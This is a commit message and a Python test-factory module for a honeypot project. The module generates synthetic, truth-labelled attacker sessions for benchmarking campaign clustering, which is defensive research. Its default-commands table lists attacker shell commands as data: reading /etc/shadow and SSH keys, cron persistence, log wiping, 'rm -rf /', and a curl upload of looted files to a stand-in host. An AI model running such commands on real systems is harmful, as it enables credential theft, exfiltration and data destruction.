Pre-implementation scaffolding for campaign clustering. The simulator is
the spec — algorithm code follows once fixtures + metrics are stable.
* decnet/clustering/ukc.py — UKCPhase enum (19 phases across In/Through/Out
stages), OBSERVABLE_PHASES set, stage_of() helper. Vocabulary aligns
with future MITRE ATT&CK tagging so synthetic data and runtime phase
inference don't need renaming when TTP-tagging lands.
* tests/factories/campaign_factory.py — YAML DSL parser + deterministic
generator emitting truth-labeled SyntheticAttacker / SyntheticSession
records. Validates phase names, warns on unobservable phases, supports
multi-campaign + noise corpora.
* tests/clustering/metrics.py — pure-Python ARI / homogeneity /
completeness / singleton_recall (no sklearn dep). Decided before any
algorithm exists, on purpose.
* tests/fixtures/campaigns/lone_wolf.{yaml,expected.yaml} — fixture 3
from the design doc; simplest of the six, exercises the full pipeline
with an identity-clusterer placeholder.
* development/CAMPAIGN_CLUSTERING.md — design spec for the feature.
* development/DEVELOPMENT_V2.md — note on DSL evolution path
(concurrent phases, multi-actor per phase) deferred post-v1.
382 lines
14 KiB
Python
382 lines
14 KiB
Python
"""
Synthetic campaign generator — see development/CAMPAIGN_CLUSTERING.md.

Reads a YAML campaign DSL describing actors, UKC phases, and tool
signatures, and emits truth-labeled SyntheticAttacker / SyntheticSession
records for the clustering test harness.

Truth labels (`truth_campaign_id`, `truth_actor_id`) are part of the
emitted records so the metric harness can score predicted clusters
against ground truth without re-parsing the DSL. Production code that
later writes the same shape into real DB tables MUST strip these fields
before clustering runs — otherwise the algorithm trivially passes by
reading the answer key.

Determinism: given the same YAML and seed, two runs produce identical
records (including IDs). This is a load-bearing property — fixture
expectations are checked against the same seed every CI run.
"""
|
|
from __future__ import annotations
|
|
|
|
import hashlib
|
|
import random
|
|
import uuid
|
|
from dataclasses import dataclass, field
|
|
from datetime import datetime, timedelta, timezone
|
|
from pathlib import Path
|
|
from typing import Any
|
|
|
|
import yaml
|
|
|
|
from decnet.clustering.ukc import OBSERVABLE_PHASES, UKCPhase
|
|
|
|
|
|
@dataclass
class SyntheticSession:
    """A single synthetic session record produced by the campaign factory.

    The ``truth_*`` fields carry the ground-truth campaign and actor the
    session was generated for, so predicted clusters can be scored
    without re-parsing the DSL.
    """

    # --- identity / placement ---
    session_id: str
    attacker_id: str
    decky_id: str

    # --- timing ---
    started_at: datetime
    duration_s: float

    # --- what happened during the session ---
    phase: UKCPhase
    commands: list[str]
    credentials_tried: list[tuple[str, str]]
    payload_hash: str | None
    c2_callback: str | None

    # --- ground truth (answer key) ---
    truth_campaign_id: str
    truth_actor_id: str
|
|
|
|
|
|
@dataclass
class SyntheticAttacker:
    """A synthetic attacker record together with the sessions attributed to it.

    ``sessions`` defaults to a fresh empty list per instance. The
    ``truth_*`` fields are the ground-truth campaign / actor labels.
    """

    # --- identity and network fingerprints ---
    attacker_id: str
    ip: str
    asn: int
    ja3: str | None
    hassh: str | None

    # --- observation window ---
    first_seen: datetime
    last_seen: datetime

    # --- ground truth (answer key) ---
    truth_campaign_id: str
    truth_actor_id: str

    # Sessions attached to this attacker; filled in after construction.
    sessions: list[SyntheticSession] = field(default_factory=list)
|
|
|
|
|
|
@dataclass
class GeneratedCorpus:
    """Factory output: the attacker records plus a flat list of sessions."""

    attackers: list[SyntheticAttacker]
    # Flattened view: every session of every attacker in one list.
    sessions: list[SyntheticSession]

    def truth_labels(self) -> dict[str, str]:
        """Return the scoring oracle: ``attacker_id`` -> ``truth_campaign_id``."""
        oracle: dict[str, str] = {}
        for attacker in self.attackers:
            oracle[attacker.attacker_id] = attacker.truth_campaign_id
        return oracle
|
|
|
|
|
|
# ─── Phase defaults ─────────────────────────────────────────────────────────
# Fallback shell commands per UKC phase, used when a phase's DSL entry does
# not supply tool_signature commands. Centralising them here keeps fixtures
# short and stops the factory from making up data on each call.

_PHASE_DEFAULT_COMMANDS: dict[UKCPhase, list[str]] = {
    # Delivery is mostly network-level, so there are no shell commands.
    UKCPhase.DELIVERY: [],
    UKCPhase.EXPLOITATION: [],
    UKCPhase.DISCOVERY: [
        "whoami",
        "id",
        "uname -a",
        "ip route",
        "arp -a",
        "cat /etc/passwd",
    ],
    UKCPhase.CREDENTIAL_ACCESS: [
        "cat /etc/shadow",
        "find / -name id_rsa",
        "cat ~/.ssh/known_hosts",
    ],
    UKCPhase.PERSISTENCE: [
        "crontab -l",
        "echo '* * * * * /tmp/.x' | crontab -",
        "cat ~/.ssh/authorized_keys",
    ],
    UKCPhase.LATERAL_MOVEMENT: [
        "ssh -i /tmp/.k root@10.0.0.5",
        "scp /tmp/.x root@10.0.0.5:/tmp/",
    ],
    UKCPhase.COLLECTION: ["tar czf /tmp/loot.tgz /var/lib/mysql /home"],
    UKCPhase.EXFILTRATION: ["curl -T /tmp/loot.tgz https://drop.example/"],
    UKCPhase.EXECUTION: ["./payload"],
    UKCPhase.PRIVILEGE_ESCALATION: [
        "sudo -l",
        "find / -perm -u=s 2>/dev/null",
    ],
    UKCPhase.DEFENSE_EVASION: ["history -c", "rm -rf /var/log/wtmp"],
    # Beaconing is observed at the network layer, not as shell commands.
    UKCPhase.COMMAND_AND_CONTROL: [],
    UKCPhase.PIVOTING: [],
    UKCPhase.IMPACT: ["rm -rf /"],
    UKCPhase.OBJECTIVES: [],
}
|
|
|
|
|
|
# ─── DSL parsing ────────────────────────────────────────────────────────────
|
|
|
|
|
|
class DSLValidationError(ValueError):
    """Signals a malformed campaign YAML or a reference to an unknown phase."""
|
|
|
|
|
|
def _validate_campaign_spec(spec: dict[str, Any]) -> list[str]:
    """Validate one ``{"campaign": {...}}`` wrapper before generation.

    Args:
        spec: Parsed YAML mapping with a top-level ``campaign`` key whose
            value declares ``id``, ``actors`` and ``phases``.

    Returns:
        Non-fatal warnings: one message per phase that is a valid UKC phase
        but is not in ``OBSERVABLE_PHASES`` (no events are emitted for it).

    Raises:
        DSLValidationError: On any structural problem — missing keys,
            non-mapping entries, no actors, duplicate actor ids, unknown
            phase names, a phase naming an undeclared actor, or a phase
            without ``actor`` in a multi-actor campaign.
    """
    if not isinstance(spec, dict) or "campaign" not in spec:
        raise DSLValidationError("missing top-level 'campaign' key")
    c = spec["campaign"]
    # An empty `campaign:` key parses to None; report it as a DSL error
    # instead of letting the membership test below raise TypeError.
    if not isinstance(c, dict):
        raise DSLValidationError("'campaign' must be a mapping")
    for key in ("id", "actors", "phases"):
        if key not in c:
            raise DSLValidationError(f"campaign missing required key: {key}")

    actor_ids: set[Any] = set()
    for i, actor in enumerate(c["actors"] or []):
        if not isinstance(actor, dict) or "id" not in actor:
            raise DSLValidationError(f"actor[{i}] missing 'id'")
        # Duplicate ids would make two attacker records share one truth
        # label while only one of them ever receives sessions.
        if actor["id"] in actor_ids:
            raise DSLValidationError(
                f"actor[{i}] has duplicate id '{actor['id']}'"
            )
        actor_ids.add(actor["id"])
    if not actor_ids:
        raise DSLValidationError("campaign must declare at least one actor")

    phases = c["phases"]
    if not isinstance(phases, (list, tuple)):
        raise DSLValidationError("campaign 'phases' must be a list")

    warnings: list[str] = []
    for i, ph in enumerate(phases):
        if not isinstance(ph, dict) or "name" not in ph:
            raise DSLValidationError(f"phase[{i}] missing 'name'")
        try:
            phase_enum = UKCPhase(ph["name"])
        except ValueError as exc:
            raise DSLValidationError(
                f"phase[{i}] has unknown UKC phase '{ph['name']}'"
            ) from exc
        if phase_enum not in OBSERVABLE_PHASES:
            warnings.append(
                f"phase '{ph['name']}' is pre-target / unobservable from a "
                f"honeypot; no events will be emitted for it"
            )
        # Single-actor campaigns can omit phase.actor; multi-actor must
        # specify it, otherwise the generator would silently attribute the
        # phase to the first actor and corrupt the truth labels.
        if "actor" in ph:
            if ph["actor"] not in actor_ids:
                raise DSLValidationError(
                    f"phase[{i}] references unknown actor '{ph['actor']}'"
                )
        elif len(actor_ids) > 1:
            raise DSLValidationError(
                f"phase[{i}] must specify 'actor' in a multi-actor campaign"
            )
    return warnings
|
|
|
|
|
|
# ─── Generator ──────────────────────────────────────────────────────────────
|
|
|
|
|
|
def _stable_uuid(rng: random.Random, prefix: str) -> str:
|
|
"""Deterministic UUID-shaped identifier driven by the seeded RNG."""
|
|
raw = rng.randbytes(16)
|
|
return f"{prefix}-{uuid.UUID(bytes=raw)}"
|
|
|
|
|
|
def _stable_ip(rng: random.Random) -> str:
|
|
"""Pick a routable-looking IPv4 in non-RFC1918 space."""
|
|
# Avoid 10/8, 172.16/12, 192.168/16, 127/8, 0/8, multicast 224+.
|
|
while True:
|
|
a = rng.randint(1, 223)
|
|
if a in (10, 127):
|
|
continue
|
|
b = rng.randint(0, 255)
|
|
if a == 172 and 16 <= b <= 31:
|
|
continue
|
|
if a == 192 and b == 168:
|
|
continue
|
|
c = rng.randint(0, 255)
|
|
d = rng.randint(1, 254)
|
|
return f"{a}.{b}.{c}.{d}"
|
|
|
|
|
|
def _payload_hash(seed: str) -> str:
|
|
return hashlib.sha256(seed.encode()).hexdigest()
|
|
|
|
|
|
def _hour_to_offset(rng: random.Random, day_start: datetime, hour: int, jitter_s: int) -> datetime:
|
|
base = day_start.replace(hour=hour, minute=0, second=0, microsecond=0)
|
|
return base + timedelta(seconds=rng.randint(-jitter_s, jitter_s) + rng.randint(0, 3600))
|
|
|
|
|
|
def generate(spec: dict[str, Any], *, seed: int = 0) -> GeneratedCorpus:
    """
    Produce a deterministic synthetic corpus from a parsed YAML spec.

    The spec mirrors the schema documented in CAMPAIGN_CLUSTERING.md.
    Multiple campaigns + a noise block can be combined by wrapping them
    in a top-level `corpus:` key; otherwise a single `campaign:` is
    expected.

    Args:
        spec: Parsed YAML mapping, either ``{"campaign": {...}}`` or
            ``{"corpus": {"campaigns": [...], "noise": {...}}}``.
        seed: Seed for the single ``random.Random`` that drives every ID,
            IP and timestamp; the same spec and seed give the same corpus.

    Returns:
        A ``GeneratedCorpus`` holding all attackers (campaign actors first,
        then noise scanners) and the flat list of their sessions.

    Raises:
        DSLValidationError: If any campaign fails validation.
    """
    # Function-scope import so this block does not depend on an edit to
    # the module's import section.
    import logging

    log = logging.getLogger(__name__)
    rng = random.Random(seed)

    campaigns: list[dict[str, Any]]
    noise_cfg: dict[str, Any]
    if "corpus" in spec:
        # Empty YAML keys (`corpus:`, `campaigns:`, `noise:`) parse to None;
        # treat them the same as absent keys instead of crashing.
        corpus_cfg = spec["corpus"] or {}
        campaigns = corpus_cfg.get("campaigns") or []
        noise_cfg = corpus_cfg.get("noise") or {}
    else:
        campaigns = [spec]
        noise_cfg = {}

    attackers: list[SyntheticAttacker] = []
    sessions: list[SyntheticSession] = []

    for c_wrapper in campaigns:
        # Validation warnings (e.g. unobservable phases) used to be thrown
        # away; log them so they can be seen and tests can assert on them.
        for warning in _validate_campaign_spec(c_wrapper):
            log.warning("campaign DSL: %s", warning)
        _emit_campaign(c_wrapper["campaign"], rng, attackers, sessions)

    # Noise is emitted after every campaign so campaign IDs do not shift
    # when only the noise configuration changes.
    _emit_noise(noise_cfg, rng, attackers, sessions)

    return GeneratedCorpus(attackers=attackers, sessions=sessions)
|
|
|
|
|
|
def _emit_campaign(
    c: dict[str, Any],
    rng: random.Random,
    attackers: list[SyntheticAttacker],
    sessions: list[SyntheticSession],
) -> None:
    """Append one campaign's attackers and sessions to the output lists.

    Creates one ``SyntheticAttacker`` per declared actor, then walks the
    phases in declared order and emits sessions for every phase that is
    in ``OBSERVABLE_PHASES``. The order of draws from *rng* is part of
    the determinism contract: changing it changes every generated ID.

    Args:
        c: The ``campaign`` mapping (``id``, ``actors``, ``phases`` and
            optional ``duration_days`` / ``pause_windows``). It is expected
            to have passed ``_validate_campaign_spec`` already.
        rng: Seeded generator shared across the whole corpus.
        attackers: Output list; new attacker records are appended.
        sessions: Output list; new session records are appended.
    """
    campaign_id = c["id"]
    duration_days = int(c.get("duration_days", 1))
    pause_windows: list[tuple[int, int]] = [
        tuple(p) for p in (c.get("pause_windows") or [])  # type: ignore[misc]
    ]
    # Days not covered by any pause window. This does not change per
    # session, so it is computed once instead of inside the session loop.
    open_days = [
        d for d in range(duration_days)
        if not any(s <= d <= e for s, e in pause_windows)
    ]

    # Anchor the synthetic timeline at a fixed epoch so determinism holds
    # across runs regardless of wall clock.
    epoch = datetime(2026, 1, 1, tzinfo=timezone.utc)

    # One attacker record per actor — the cross-session identity the
    # clusterer is supposed to recover. Each actor gets a single generated
    # IP; no per-session IP rotation is implemented here.
    actor_attackers: dict[str, SyntheticAttacker] = {}
    actor_specs: dict[str, dict[str, Any]] = {}
    for actor in c["actors"]:
        a_id = _stable_uuid(rng, "att")
        att = SyntheticAttacker(
            attacker_id=a_id,
            ip=_stable_ip(rng),
            asn=int(actor.get("asn", 0)),
            ja3=actor.get("ja3"),
            hassh=actor.get("hassh"),
            first_seen=epoch,
            last_seen=epoch,
            truth_campaign_id=campaign_id,
            truth_actor_id=actor["id"],
        )
        actor_attackers[actor["id"]] = att
        # setdefault keeps the first spec for an id, as the earlier
        # first-match lookup did.
        actor_specs.setdefault(actor["id"], actor)
        attackers.append(att)

    # Walk phases in declared order. Each phase produces N sessions
    # against random deckies (or a sticky one if previous_success).
    decky_pool = [f"decky-{i:02d}" for i in range(1, 21)]
    last_success_decky: dict[str, str] = {}

    for ph in c["phases"]:
        phase = UKCPhase(ph["name"])
        if phase not in OBSERVABLE_PHASES:
            continue  # pre-target phase; emit nothing

        actor_id = ph.get("actor") or c["actors"][0]["id"]
        att = actor_attackers[actor_id]
        actor_spec = actor_specs[actor_id]

        sig = ph.get("tool_signature") or {}
        # Only fall back to the defaults table when the DSL gives no
        # commands, and tolerate phases the table does not list: the old
        # eager `[phase]` lookup raised KeyError for those even when
        # commands were supplied. An explicit empty list is kept.
        commands = sig.get("commands")
        if commands is None:
            commands = _PHASE_DEFAULT_COMMANDS.get(phase, [])
        creds_list = sig.get("credentials") or []
        c2 = sig.get("c2_callback")
        payload_seed = sig.get("payload_hash")
        payload = _payload_hash(payload_seed) if payload_seed else None

        target_sel = ph.get("target_selector") or {}
        n_sessions = int(target_sel.get("count", 1))
        if target_sel.get("decky") == "previous_success":
            decky_choices = [last_success_decky.get(actor_id, decky_pool[0])]
        else:
            decky_choices = decky_pool

        # Schedule sessions across the campaign window, respecting the
        # actor's hours_active_utc and pause_windows. A null or empty
        # hours list means "any hour" rather than a crash in rng.choice.
        active_hours = actor_spec.get("hours_active_utc") or list(range(24))
        jitter = int(actor_spec.get("jitter_seconds", 60))
        duration_s = float(ph.get("dwell_seconds", 5))

        for _ in range(n_sessions):
            day = rng.randint(0, max(0, duration_days - 1))
            if any(start <= day <= end for start, end in pause_windows):
                # The drawn day is paused: redraw among non-paused days,
                # or drop the session if the whole window is paused.
                if not open_days:
                    continue
                day = rng.choice(open_days)
            hour = rng.choice(active_hours)
            day_start = epoch + timedelta(days=day)
            started_at = _hour_to_offset(rng, day_start, hour, jitter)

            # Keyword arguments evaluate in order: the session UUID is
            # drawn before the decky choice.
            sess = SyntheticSession(
                session_id=_stable_uuid(rng, "sess"),
                attacker_id=att.attacker_id,
                decky_id=rng.choice(decky_choices),
                started_at=started_at,
                duration_s=duration_s,
                phase=phase,
                commands=list(commands),
                credentials_tried=[tuple(p) for p in creds_list],  # type: ignore[misc]
                payload_hash=payload,
                c2_callback=c2,
                truth_campaign_id=campaign_id,
                truth_actor_id=actor_id,
            )

            # Track the observation window by whether any session exists
            # yet, not by comparing against `epoch`: jitter can put a
            # session at or before epoch, which used to leave last_seen
            # stuck at epoch or let a later session overwrite first_seen.
            is_first_session = not att.sessions
            sessions.append(sess)
            att.sessions.append(sess)
            if is_first_session:
                att.first_seen = started_at
                att.last_seen = started_at
            else:
                att.first_seen = min(att.first_seen, started_at)
                att.last_seen = max(att.last_seen, started_at)

            # If this phase is a "successful entry," remember the decky
            # for any subsequent previous_success target_selector.
            if phase in (UKCPhase.EXPLOITATION, UKCPhase.PERSISTENCE):
                last_success_decky[actor_id] = sess.decky_id
|
|
|
|
|
|
def _emit_noise(
    noise_cfg: dict[str, Any],
    rng: random.Random,
    attackers: list[SyntheticAttacker],
    sessions: list[SyntheticSession],
) -> None:
    """Append background scanners: one attacker with one session each.

    ``noise_cfg["scanner_count"]`` (default 0) sets how many scanners are
    added. Every scanner is its own truth campaign and truth actor, has no
    ja3 / hassh, and gets a single Delivery-phase session with no commands,
    credentials, payload or C2 callback.
    """
    scanner_total = int(noise_cfg.get("scanner_count", 0))
    if scanner_total < 1:
        return

    day_zero = datetime(2026, 1, 1, tzinfo=timezone.utc)
    for idx in range(scanner_total):
        label = f"noise-scanner-{idx:04d}"

        # Draw order is fixed: attacker id, IP, ASN, start time,
        # session id, decky.
        att_id = _stable_uuid(rng, "att")
        att_ip = _stable_ip(rng)
        att_asn = rng.randint(1000, 65000)
        seen_at = day_zero + timedelta(seconds=rng.randint(0, 86400))

        scanner = SyntheticAttacker(
            attacker_id=att_id,
            ip=att_ip,
            asn=att_asn,
            ja3=None,
            hassh=None,
            first_seen=seen_at,
            last_seen=seen_at,
            truth_campaign_id=label,  # each scanner is its own truth-campaign
            truth_actor_id=label,
        )
        attackers.append(scanner)

        # A single Delivery-phase session with no follow-up.
        sess_id = _stable_uuid(rng, "sess")
        decky = f"decky-{rng.randint(1, 20):02d}"
        probe = SyntheticSession(
            session_id=sess_id,
            attacker_id=att_id,
            decky_id=decky,
            started_at=seen_at,
            duration_s=1.0,
            phase=UKCPhase.DELIVERY,
            commands=[],
            credentials_tried=[],
            payload_hash=None,
            c2_callback=None,
            truth_campaign_id=label,
            truth_actor_id=label,
        )
        sessions.append(probe)
        scanner.sessions.append(probe)
|
|
|
|
|
|
def load_yaml(path: str | Path) -> dict[str, Any]:
    """Load a campaign fixture from *path* and return the parsed mapping.

    The file is read as UTF-8 and parsed with ``yaml.safe_load``.

    Raises:
        DSLValidationError: If the document's top level is not a mapping.
    """
    document = yaml.safe_load(Path(path).read_text(encoding="utf-8"))
    if isinstance(document, dict):
        return document
    raise DSLValidationError(f"campaign YAML at {path} did not parse to a mapping")
|